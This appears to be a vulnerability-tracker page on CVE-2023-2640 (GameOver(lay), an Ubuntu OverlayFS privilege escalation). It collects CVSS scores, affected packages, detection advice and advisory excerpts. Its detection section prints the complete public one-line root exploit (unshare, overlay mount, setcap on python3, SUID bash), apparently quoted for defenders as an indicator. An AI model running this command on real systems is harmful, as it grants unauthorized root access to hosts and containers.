CVE-2023-2640
published 2023-07-26CVE-2023-2640: On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may…
PriorityP179high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
15.78%
96.5th percentile
On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
Affected
31 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| debian | linux | — | — |
| ubuntu | linux | — | — |
| ubuntu | linux-aws | — | — |
| ubuntu | linux-aws-5.15 | — | — |
| ubuntu | linux-aws-fips | — | — |
| ubuntu | linux-azure | — | — |
| ubuntu | linux-azure-5.15 | — | — |
| ubuntu | linux-azure-fips | — | — |
| ubuntu | linux-fips | — | — |
| ubuntu | linux-gcp | — | — |
| ubuntu | linux-gcp-5.15 | — | — |
| ubuntu | linux-gcp-fips | — | — |
| ubuntu | linux-gke | — | — |
| ubuntu | linux-gkeop | — | — |
| ubuntu | linux-hwe-5.15 | — | — |
| ubuntu | linux-ibm | — | — |
| ubuntu | linux-ibm-5.15 | — | — |
| ubuntu | linux-intel-iot-realtime | — | — |
| ubuntu | linux-intel-iotg | — | — |
| ubuntu | linux-intel-iotg-5.15 | — | — |
| ubuntu | linux-kvm | — | — |
| ubuntu | linux-lowlatency | — | — |
| ubuntu | linux-lowlatency-hwe-5.15 | — | — |
| ubuntu | linux-nvidia | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandunshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'↗
- →Detect use of 'unshare' with '-rm' flags combined with overlayfs mount operations (lowerdir/upperdir/workdir) — this is the core primitive of the CVE-2023-2640 one-line exploit. ↗
- →Alert on 'setcap cap_setuid+eip' being called on a copied interpreter binary (e.g., python3) inside a user-created directory — indicates capability-planting via overlayfs copy-up. ↗
- →Monitor for creation of SUID bash binaries in world-writable temp directories (e.g., /var/tmp/bash with permissions -rwsr-xr-x owned by root), which indicates successful privilege escalation. ↗
- →Alert on overlayfs mount operations where files with capabilities (CAP_SYS_ADMIN, CAP_SETUID) in the lower directory are copied to the upper directory — the core mechanism of both CVE-2023-2640 and CVE-2023-32629. ↗
- →On July 28, 2023, a public one-line exploit for CVE-2023-2640 was disclosed via Twitter — monitor threat intel feeds for weaponized PoCs and scan for the exploit pattern in process command lines. ↗
- →CVE-2023-2640 is exploitable when the Ubuntu kernel carries both commit c914c0e27eb0 and the SAUCE patch 'overlayfs: Skip permission checking for trusted.overlayfs.* xattrs' — check kernel version and patch state to identify vulnerable hosts. ↗
- ·The vulnerability requires the Ubuntu kernel to carry BOTH commit c914c0e27eb0 AND the Ubuntu-specific SAUCE patch for overlayfs xattr permission skipping — vanilla upstream kernels are not affected. ↗
- ·Containers running on vulnerable Ubuntu hosts are also at risk, not just the host itself — container workloads on Docker and Kubernetes are exploitable under certain conditions. ↗
- ·The exploit was demonstrated on Ubuntu 22.04.3 LTS running kernel 6.2.0-25-generic — patch assessment should include this specific kernel version. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv7.8HIGH
vulncheck7.8HIGH
vendor_debian7.8LOW
vendor_redhat7.8HIGH
vendor_ubuntu7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Linux kernel (Oracle) vulnerabilities
vendor_ubuntu·2026-06-16·CVSS 7.8
CVE-2024-35862 [HIGH] Linux kernel (Oracle) vulnerabilities
Title: Linux kernel (Oracle) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in
the Ubuntu Linux kernel did not properly perform permission checks in
certain situations. A local attacker could possibly use this to gain
elevated privileges. (CVE-2023-32629)
Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following
Ubuntu
Linux kernel (GCP) vulnerabilities
vendor_ubuntu·2026-05-22·CVSS 7.8
CVE-2023-2640 [HIGH] Linux kernel (GCP) vulnerabilities
Title: Linux kernel (GCP) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in
the Ubuntu Linux kernel did not properly perform permission checks in
certain situations. A local attacker could possibly use this to gain
elevated privileges. (CVE-2023-32629)
Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following sub
Ubuntu
Linux kernel (Xilinx ZynqMP) vulnerabilities
vendor_ubuntu·2026-05-19·CVSS 7.8
CVE-2026-23093 [HIGH] Linux kernel (Xilinx ZynqMP) vulnerabilities
Title: Linux kernel (Xilinx ZynqMP) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in
the Ubuntu Linux kernel did not properly perform permission checks in
certain situations. A local attacker could possibly use this to gain
elevated privileges. (CVE-2023-32629)
Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the fol
Ubuntu
Linux kernel (Azure) vulnerabilities
vendor_ubuntu·2026-05-11·CVSS 7.8
CVE-2026-23273 [HIGH] Linux kernel (Azure) vulnerabilities
Title: Linux kernel (Azure) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in
the Ubuntu Linux kernel did not properly perform permission checks in
certain situations. A local attacker could possibly use this to gain
elevated privileges. (CVE-2023-32629)
Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following s
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2026-05-07·CVSS 7.8
CVE-2023-2640 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in
the Ubuntu Linux kernel did not properly perform permission checks in
certain situations. A local attacker could possibly use this to gain
elevated privileges. (CVE-2023-32629)
Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystem
Ubuntu
Linux kernel (OEM) vulnerabilities
vendor_ubuntu·2023-08-11·CVSS 7.1
CVE-2023-38430 [HIGH] Linux kernel (OEM) vulnerabilities
Title: Linux kernel (OEM) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
It was discovered that the NTFS file system implementation in the Linux
kernel did not properly check buffer indexes in certain situations, leading
to an out-of-bounds read vulnerability. A local attacker could possibly use
this to expose sensitive information (kernel memory). (CVE-2022-48502)
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
It was discovered that a race condition existed in the f2fs file system in
the Linux kernel, leading to a null pointer dereferenc
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2023-07-27·CVSS 7.1
CVE-2023-31248 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
It was discovered that the NTFS file system implementation in the Linux
kernel did not properly check buffer indexes in certain situations, leading
to an out-of-bounds read vulnerability. A local attacker could possibly use
this to expose sensitive information (kernel memory). (CVE-2022-48502)
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
It was discovered that the IP-VLAN network driver for the Linux kernel did
not properly initialize memory in some situations, leading t
Ubuntu
Linux kernel (OEM) vulnerabilities
vendor_ubuntu·2023-07-25·CVSS 5.5
CVE-2023-21106 [MEDIUM] Linux kernel (OEM) vulnerabilities
Title: Linux kernel (OEM) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
It was discovered that the network queuing discipline implementation in the
Linux kernel contained a null pointer dereference in some situations. A
local attacker could use this to cause a denial of service (system crash).
(CVE-2022-47929)
It was discovered that a race condition existed in Adreno GPU DRM driver in
the Linux kernel, leading to a double-free vulnerability. A local attacker
could use this to cause a denial of service (system crash).
(CVE-2023-21106)
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this t
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2023-07-25·CVSS 7.8
CVE-2023-35001 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
It was discovered that the IP-VLAN network driver for the Linux kernel did
not properly initialize memory in some situations, leading to an out-of-
bounds write vulnerability. An attacker could use this to cause a denial of
service (system crash) or possibly execute arbitrary code. (CVE-2023-3090)
Mingi Cho discovered that the netfilter subsystem in the Linux kernel did
not properly validate the status of a nft chain while per
Red Hat
kernel: overlayfs: In Ubuntu skip permission checking for trusted.overlayfs.* xattrs
vendor_redhat·2023-07-06·CVSS 7.8
CVE-2023-2640 [HIGH] kernel: overlayfs: In Ubuntu skip permission checking for trusted.overlayfs.* xattrs
kernel: overlayfs: In Ubuntu skip permission checking for trusted.overlayfs.* xattrs
On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
A flaw was found in the Linux Kernel where the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. This flaw allows a local attacker to gain elevated privileges due to skipped permission in checking for trusted.overlayfs.* xattrs (CVE-2023-2640). There is a similar local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_m
Red Hat
kernel: overlayfs: In Ubuntu skip permission checking for trusted.overlayfs.* xattrs
vendor_redhat·2023-07-06·CVSS 7.8
CVE-2023-32629 [HIGH] kernel: overlayfs: In Ubuntu skip permission checking for trusted.overlayfs.* xattrs
kernel: overlayfs: In Ubuntu skip permission checking for trusted.overlayfs.* xattrs
Local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data skip permission checks when calling ovl_do_setxattr on Ubuntu kernels
A flaw was found in the Linux Kernel where the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. This flaw allows a local attacker to gain elevated privileges due to skipped permission in checking for trusted.overlayfs.* xattrs (CVE-2023-2640). There is a similar local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data due to skipped permission checks when calling ovl_do_setxattr on Ubuntu kernels (CVE-2023-32629).
Package: kernel (R
Debian
CVE-2023-2640: linux - On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip...
vendor_debian·2023·CVSS 7.8
CVE-2023-2640 [HIGH] CVE-2023-2640: linux - On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip...
On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
OSV
linux-oem-6.1 vulnerabilities
osv·2023-08-11·CVSS 7.1
CVE-2022-48502 [HIGH] linux-oem-6.1 vulnerabilities
linux-oem-6.1 vulnerabilities
It was discovered that the NTFS file system implementation in the Linux
kernel did not properly check buffer indexes in certain situations, leading
to an out-of-bounds read vulnerability. A local attacker could possibly use
this to expose sensitive information (kernel memory). (CVE-2022-48502)
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
It was discovered that a race condition existed in the f2fs file system in
the Linux kernel, leading to a null pointer dereference vulnerability. An
attacker could use this to construct a malicious f2fs imag
OSV
linux-aws-5.19, linux-gcp-5.19, linux-hwe-5.19 vulnerabilities
osv·2023-07-27·CVSS 7.1
CVE-2022-48502 [HIGH] linux-aws-5.19, linux-gcp-5.19, linux-hwe-5.19 vulnerabilities
linux-aws-5.19, linux-gcp-5.19, linux-hwe-5.19 vulnerabilities
It was discovered that the NTFS file system implementation in the Linux
kernel did not properly check buffer indexes in certain situations, leading
to an out-of-bounds read vulnerability. A local attacker could possibly use
this to expose sensitive information (kernel memory). (CVE-2022-48502)
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
It was discovered that the IP-VLAN network driver for the Linux kernel did
not properly initialize memory in some situations, leading to an out-of-
bounds write vulnerability
GHSA
GHSA-38f7-vv5r-859m: On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted
ghsa_unreviewed·2023-07-26
CVE-2023-2640 [HIGH] CWE-863 GHSA-38f7-vv5r-859m: On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted
On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
OSV
linux-oem-6.0 vulnerabilities
osv·2023-07-25·CVSS 5.5
CVE-2022-47929 [MEDIUM] linux-oem-6.0 vulnerabilities
linux-oem-6.0 vulnerabilities
It was discovered that the network queuing discipline implementation in the
Linux kernel contained a null pointer dereference in some situations. A
local attacker could use this to cause a denial of service (system crash).
(CVE-2022-47929)
It was discovered that a race condition existed in Adreno GPU DRM driver in
the Linux kernel, leading to a double-free vulnerability. A local attacker
could use this to cause a denial of service (system crash).
(CVE-2023-21106)
Stonejiajia, Shir Tamari and Sagi Tzadik discovered that the OverlayFS
implementation in the Ubuntu Linux kernel did not properly perform
permission checks in certain situations. A local attacker could possibly
use this to gain elevated privileges. (CVE-2023-2640)
Mingi Cho discovered that the net
OSV
CVE-2023-2640: On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted
osv·2023-06-06·CVSS 7.8
CVE-2023-2640 [HIGH] CVE-2023-2640: On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted
On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
VulnCheck
canonical ubuntu_linux Incorrect Authorization
vulncheck·2023·CVSS 7.8
CVE-2023-2640 [HIGH] canonical ubuntu_linux Incorrect Authorization
canonical ubuntu_linux Incorrect Authorization
On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
Affected: canonical ubuntu_linux
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://securelist.com/vulnerability-exploit-report-q2-2024/113455/; https://securelist.com/exploits-and-vulnerabilities-q3-2024/114839/
Exploit PoC: https://vulncheck.com/xdb/8c496ca56767; https://vulncheck.com/xdb/16afc028b0b7; https
Metasploit
GameOver(lay) Privilege Escalation and Container Escape
metasploit·CVSS 7.8
CVE-2021-3493 [HIGH] GameOver(lay) Privilege Escalation and Container Escape
GameOver(lay) Privilege Escalation and Container Escape
This module exploits the use of unsafe functions in a number of Ubuntu kernels utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is called during ovl_do_setxattr without calling the intermediate safety function vfs_setxattr. Ultimatly this module allows for root access to be achieved by writing setuid capabilities to a file which are not sanitized after being unioned with the upper mounted directory.
Nuclei
GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
nuclei·CVSS 7.8
CVE-2023-2640 [HIGH] GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
Template:
id: CVE-2023-2640
info:
name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
author: princechaddha
severity: high
description: |
A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
impact: |
An attacker with local access can gain elevated privileges on the affe
Wiz
Kubernetes Security Context for Secure Container Workloads | Wiz
blogs_wiz·2025-09-25
Kubernetes Security Context for Secure Container Workloads | Wiz
A Kubernetes security context defines the runtime privileges and access controls for pods and containers, making it one of the most critical levers for enforcing least privilege and reducing attack surface. By carefully configuring security contexts, you can increase the security posture of your workloads, mitigate potential threats, and simplify compliance.
## The benefits of implementing security contexts
runAsNonRoot
readOnlyRootFilesystem
Here are some key advantages of leveraging Kubernetes security contexts:
## Enhanced security posture
Security contexts provide strict, runtime-level controls over containers and pods, including running processes as non-root users, restricting access to the root filesystem, and limiting Linux capabilities. These security measures limit privilege
Wiz
Kubernetes Security Context for Secure Container Workloads | Wiz
blogs_wiz·2025-09-25
Kubernetes Security Context for Secure Container Workloads | Wiz
A Kubernetes security context defines the runtime privileges and access controls for pods and containers, making it one of the most critical levers for enforcing least privilege and reducing attack surface. By carefully configuring security contexts, you can increase the security posture of your workloads, mitigate potential threats, and simplify compliance.
## The benefits of implementing security contexts
By implementing security contexts, teams gain fine-grained controls at both the pod and container levels. This practice helps them mitigate common vulnerabilities and enforce least privilege policies via settings like `runAsNonRoot`, `readOnlyRootFilesystem`, and scoped Linux capabilities. It also strengthens cluster-level defenses by leveraging SELinux options and AppArmor profiles.
Wiz
What Is Privilege Escalation? Types and Prevention Strategies | Wiz
blogs_wiz·2025-03-18
What Is Privilege Escalation? Types and Prevention Strategies | Wiz
Privilege escalation is when an attacker exploits weaknesses in your environment or infrastructure to gain higher access and control within a system or network.
Most organizations take multiple measures to tighten security, including defining different privilege levels for different user accounts. For example, you wouldn’t give ordinary users access to your most confidential, business-critical files. These security measures frustrate attackers who access your system through lower-privileged user accounts—so they try to gain more privileges in order to achieve malicious goals such as exfiltrating or encrypting your data.
## Incident Response Playbook Template: Privilege Escalation in EKS
Detect, investigate, and respond to privilege escalation in Amazon EKS clusters with this comprehensi
Wiz
What Is Privilege Escalation? Types and Prevention Strategies | Wiz
blogs_wiz·2025-03-18
What Is Privilege Escalation? Types and Prevention Strategies | Wiz
Privilege escalation is when an attacker exploits weaknesses in your environment or infrastructure to gain higher access and control within a system or network.
Most organizations take multiple measures to tighten security, including defining different privilege levels for different user accounts. For example, you wouldn’t give ordinary users access to your most confidential, business-critical files. These security measures frustrate attackers who access your system through lower-privileged user accounts—so they try to gain more privileges in order to achieve malicious goals such as exfiltrating or encrypting your data.
Incident Response Playbook Template: Privilege Escalation in EKSDetect, investigate, and respond to privilege escalation in Amazon EKS clusters with this comprehensive in
Securelist
Exploits and vulnerabilities in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Exploits and vulnerabilities in Q3 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most prevalent exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-47177 (CUPS filters)
CVE-2024-38112 (MSHTML Spoofing)
CVE-2024-6387 (regreSSHion)
CVE-2024-3183 (Free IPA)
CVE-2024-45519 (Zimbra)
CVE-2024-5290 (Ubuntu wpa_supplicant)
Conclusion and advice
Authors
Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Co
Securelist
Analyzing the vulnerability landscape in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Analyzing the vulnerability landscape in Q3 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- CVE-2024-47177 (CUPS filters)
- CVE-2024-38112 (MSHTML Spoofing)
- CVE-2024-6387 (regreSSHion)
- CVE-2024-3183 (Free IPA)
- CVE-2024-45519 (Zimbra)
- CVE-2024-5290 (Ubuntu wpa_supplicant)
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Common Log Filing System (CLFS) in Windows, so the number
Wiz
What Is Cloud Identity Security? | Wiz
blogs_wiz·2024-10-18
What Is Cloud Identity Security? | Wiz
## What is cloud identity security?
Cloud identity security is the practice of safeguarding digital identities and the sensitive cloud infrastructure and data they gatekeep from unauthorized access and misuse. The practice encompasses identity and access control mechanisms to allow or disallow access to human users (e.g., developers), service accounts, application identities, and other entities interacting with cloud services.
## Expose cloud risks no other tool can
Learn how Wiz Cloud surfaces toxic combinations across misconfigurations, identities, vulnerabilities, and data—so you can take action fast.
For information about how Wiz handles your personal data, please see our Privacy Policy .
## The shift from traditional to cloud identity management
Traditionally, identity security
Wiz
What Is Cloud Identity Security? | Wiz
blogs_wiz·2024-10-18
What Is Cloud Identity Security? | Wiz
## What is cloud identity security?
Cloud identity security is the practice of safeguarding digital identities and the sensitive cloud infrastructure and data they gatekeep from unauthorized access and misuse. The practice encompasses identity and access control mechanisms to allow or disallow access to human users (e.g., developers), service accounts, application identities, and other entities interacting with cloud services.
###### Expose cloud risks no other tool can
Learn how Wiz Cloud surfaces toxic combinations across misconfigurations, identities, vulnerabilities, and data—so you can take action fast.
## The shift from traditional to cloud identity management
Traditionally, identity security was managed on-premises; all identities came from a single, limited but easy-to-control
Securelist
Exploits and vulnerabilities in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Exploits and vulnerabilities in Q2 2024
Table of Contents
Statistics on registered vulnerabilities
Vulnerability exploitation statistics
Windows and Linux vulnerability exploitation
Most common exploits
Vulnerability exploitation in APT attacks
Exploiting vulnerable drivers to attack operating systems
BYOVD attack tools
Interesting vulnerabilities
CVE-2024-26169 (WerKernel.sys)
CVE-2024-26229 (csc.sys)
CVE-2024-4577 (PHP CGI)
Takeaways and recommendations
Authors
Vitaly Morgunov
Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not h
Securelist
Analyzing the vulnerability landscape in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Analyzing the vulnerability landscape in Q2 2024
Table of Contents
- Statistics on registered vulnerabilities
- Vulnerability exploitation statistics
- Vulnerability exploitation in APT attacks
- Exploiting vulnerable drivers to attack operating systems
- Interesting vulnerabilities
- CVE-2024-26169 (WerKernel.sys)
- CVE-2024-26229 (csc.sys)
- CVE-2024-4577 (PHP CGI)
- Takeaways and recommendations
Authors
- Vitaly Morgunov
- Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not have to be fresh, since attackers themselves deliver unpatched drivers to t
Wiz
#8 - GameOverlay – privilege escalation vulnerabilities in Ubuntu | Wiz
blogs_wiz·2023-08-29·CVSS 7.8
[HIGH] #8 - GameOverlay – privilege escalation vulnerabilities in Ubuntu | Wiz
Podcast
## #8 - GameOverlay – privilege escalation vulnerabilities in Ubuntu
🍿🤏 Everything you need to know about this month's cloud security drama in the latest "Crying Out Cloud" episode!
In this edition, we explore THREE captivating stories 📚🔍
1️⃣ "GameOverlay" unveiled: Ubuntu's privilege escalation vulnerabilities 😱 — Wiz Research uncovered a pair of vulnerabilities that's affecting 40% of Ubuntu cloud machines! We've got the scoop on what you must know.
2️⃣ Unmasking "P2PInfect": The botnet targeting Redis! 🤖 — Ever wondered how a botnet hijacks your exposed Redis instances? Let's get into the nitty-gritty of this attack and find out how to defend your environment.
3️⃣ Jumpcloud's dance with North Korea: A supply chain saga 🕊️ -—Join us as we uncover the tale of Jumpcloud's b
Wiz
Crying Out Cloud - July Newsletter | Wiz
blogs_wiz·2023-08-01·CVSS 4.3
CVE-2023-2640 [MEDIUM] Crying Out Cloud - July Newsletter | Wiz
Welcome back! In this edition, we bring you the latest in cloud security – crucial vulnerabilities, exclusive data, and noteworthy incidents. Stay informed and stay secure. Let's delve in.
Here are our cloud security highlights for July!
## ✨ Highlights
## GameOver (lay): local privilege escalation vulnerabilities in Ubuntu Linux
Wiz Research discovered CVE-2023-2640 and CVE-2023-32629, two easy-to-exploit privilege escalation vulnerabilities in the OverlayFS module in Ubuntu affecting 40% of Ubuntu cloud workloads.
CVE-2023-2640 and CVE-2023-32629 were found in the OverlayFS module in Ubuntu, which is a widely used Linux filesystem that became highly popular with the rise of containers as its features enable the deployment of dynamic filesystems based on pre-built images. Successful
Wiz
GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog
blogs_wiz·2023-07-27·CVSS 7.8
CVE-2023-2640 [HIGH] GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog
CVE-2023-2640 and CVE-2023-32629 were found in the OverlayFS module in Ubuntu, which is a widely used Linux filesystem that became highly popular with the rise of containers as its features enable the deployment of dynamic filesystems based on pre-built images. OverlayFS serves as an attractive attack surface as it has a history of numerous logical vulnerabilities that were easy to exploit. This makes the new discovered vulnerabilities especially risky given the exploits for the past OverlayFS vulnerabilities work out of the box without any changes.
The two vulnerabilities are exclusive to Ubuntu because Ubuntu introduced several changes to the OverlayFS module in 2018. These modifications did not pose any risks at the time. In 2020, a security vulnerability was discovered and patched in
Wiz
GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog
blogs_wiz·2023-07-27·CVSS 7.8
CVE-2023-2640 [HIGH] GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog
CVE-2023-2640 and CVE-2023-32629 were found in the OverlayFS module in Ubuntu, which is a widely used Linux filesystem that became highly popular with the rise of containers as its features enable the deployment of dynamic filesystems based on pre-built images. OverlayFS serves as an attractive attack surface as it has a history of numerous logical vulnerabilities that were easy to exploit. This makes the new discovered vulnerabilities especially risky given the exploits for the past OverlayFS vulnerabilities work out of the box without any changes.
The two vulnerabilities are exclusive to Ubuntu because Ubuntu introduced several changes to the OverlayFS module in 2018. These modifications did not pose any risks at the time. In 2020, a security vulnerability was discovered and patched in
Crowdstrike
New Exploit: Rooting Non-Root Containers with GameOver(lay)
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] New Exploit: Rooting Non-Root Containers with GameOver(lay)
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
